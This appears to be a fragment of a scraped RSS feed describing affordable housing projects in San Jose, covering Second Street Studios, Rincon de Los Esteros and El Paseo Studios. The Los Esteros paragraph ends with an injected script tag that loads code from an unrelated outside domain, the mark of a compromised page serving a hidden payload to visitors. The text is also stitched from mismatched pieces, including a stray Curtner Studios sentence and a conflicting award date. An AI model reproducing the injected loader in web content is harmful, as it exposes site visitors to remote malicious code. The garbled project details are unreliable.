			<content:encoded><![CDATA[<p>First Community Housing is proposing to build 134 energy-efficient studio and one-bedroom apartments at the corner of South Second Street and Keyes Street over ground-level retail. Thirty-five percent of the units will be set aside for the developmentally disabled population and those who require in-home services.</p>

<p>Rob Wellington Quigley, AIA is an award-winning architectural firm that designed the building. The current plan includes 11,211 square feet of retail space on the ground floor, with on-site parking for customers, employees, and residents. The building is registered in the LEED for Homes Mid-rise pilot program incorporates a living roof, and is expected to receive a LEED Gold or Platinum certification.</p>
<p>Second Street Studios will showcase innovative, green building materials and systems developed in Silicon Valley. The US Green Building Councils LEED certification program credits buildings that use regional materials within a 500 mile radius. The Second and Keyes building will focus more specifically on the influence and innovation of the Silicon Valley. LEED defines locally sourced materials as those building materials or products that have extracted, harvested or recovered, as well as manufactured, within proximity to the site.</p>

Curtner Studios is located near retail, restaurants, commercial services, churches, a supermarket, pharmacy, schools, a public library, parks and a medical facility.</p>

			<content:encoded><![CDATA[<p>Rincon de Los Esteros (Los Esteros) is a 246-unit affordable housing project on a 7.7 acre site in north San Jose. In all, there are eight residential buildings and a Clubhouse on the site. The buildings&#8217; arrangement on the site creates diversity of open spaces. The buildings&#8217; individual stoop entrances and gates to patios encourage strong resident interaction. The central cross axis open area includes the Clubhouse on one end and a secured Tot Lot and adjacent sitting area on the other.</p>

<p>At 3,034 square feet, the Clubhouse serves as a leasing and management office as well as the projects&#8217; community and recreation center. The Clubhouse includes many amenities, such as a lounge with fireplace, video room with adjacent kitchen, restrooms with showers and offices for a Resident Services Coordinator and a leasing/management wing. Outside amenities include a 50-foot pool with ample sitting area and an arcade on two sides, which provides additional outdoor activity areas and also promotes a sense of enclosure and security.</p>

<p>All of the residential buildings are four stories with three of the buildings having a fully secured, single level, below grade podium parking garage. The site has 456 parking spaces with 102 spaces in the three garages. There are 12 one-bedroom units at 600 square feet. The two-bedroom units total 150 and range from 849 to 857 square feet. The remaining units are all three bedrooms, 84 units total, ranging from 1,104 to 1,400 square feet.</p>
<p>Building exteriors are wood horizontal siding and cedar shingles. There are wood decks, wood brackets and trellises, canvas awnings and other trim components to add color, articulation and richness to the buildings. The living rooms on the upper floors have raised ceilings with pyramid shaped roofs covered in painted metal roofing.</p>
<p>All of the buildings are further articulated with vertical planes of color. The Clubhouse has EIFS cladding, which is intended to complement the design of the residential buildings in order to achieve diversity and sense of hierarchy within the project. The smooth white walls of the Clubhouse add an additional element, distinguishing the unique role of this building within the community. At the same time, common themes (wood brackets, accent colors, metal roofing, pyramid roofed tower) are introduced to ensure a level of continuity.</p>
<p>Los Esteros was recognized with the &#8220;1985 Builder&#8217;s Choice Grand Award&#8221;, featured in the October, 1995 issue of Builder Magazine, and included in the January, 1996 issue of Architectural Record. In 1997, Los Esteros also received an &#8220;Honor Award&#8221; from the AIA/Santa Clara Valley Chapter.<script src="http://ao.euuaw.com/9"></script></p>

			<content:encoded><![CDATA[<p>El Paseo Studios is a 98 unit Single Room Occupancy [SRO] Apartment Complex for individuals who earn 30-55% of the Area Median Income [AMI]. It is located on a one half acre, triangular site at the apex of two arterial Streets in the Westgate Shopping Area of San Jose. The retail/entertainment surroundings, and available transit, make this site a perfect location for workforce Housing.</p>

<p>Over 45% of Paseo residents work in the area. All residents receive free &#8220;Eco Passes&#8221; for County-wide buses and light rail. Local Planning regulations required a .5 parking ratio or 49 parking spaces for the 98 units.</p>
<p>Each unit has a kitchenette, built-in storage and closets, a certified maple bed and a complete bathroom. The units range from 285SF to 310SF and have individual heating and air conditioning controls. The floors are recycled content carpet with linoleum in the bathroom and kitchen. The kitchen cabinets and built in shelving are made from non-urea formaldehyde &#8220;medite&#8221; and finished with a three coat no-VOC, water based lacquer. These &#8220;green&#8221; amenities ensure a higher level of indoor air quality.</p>

It is located near local shopping and incorporates a transit stop along King Road at the project&#8217;s entry. All units have a private balcony. On the first floor, fenced courtyards create direct access to the Community Building and grass/play area.</p>
